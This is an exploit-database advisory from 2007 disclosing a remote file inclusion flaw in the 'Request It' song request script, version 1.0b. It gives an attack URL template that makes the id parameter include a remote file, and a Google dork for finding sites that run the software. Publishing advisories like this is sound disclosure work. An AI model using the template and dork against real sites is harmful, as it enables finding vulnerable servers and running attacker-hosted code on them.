id: 1749
date: 04/11/2007
title: Request It 1.0b (index.php id) Remote File Inclusion Vulnerability
author: hackberry
cves: 

==================================================================
Request It 1.0b (index.php id) Remote File Inclusion Vulnerability
==================================================================




Request It : Song Request System 1.0b - remote file inclusion

Software: Request It : Song Request System
Type: remote file inclusion
Version: 1.0b
Date: 2007-04-09
Url: http://scripts.ringsworld.com/organizers/requestit/
Risc: middle

------------------------------------
Vulnerability:

http://[target]/?id=[REMOTEFILE]

------------------------------------
Google dork:

"[ Request us to play you a song ]"




#  0day.today [2023-03-27]  #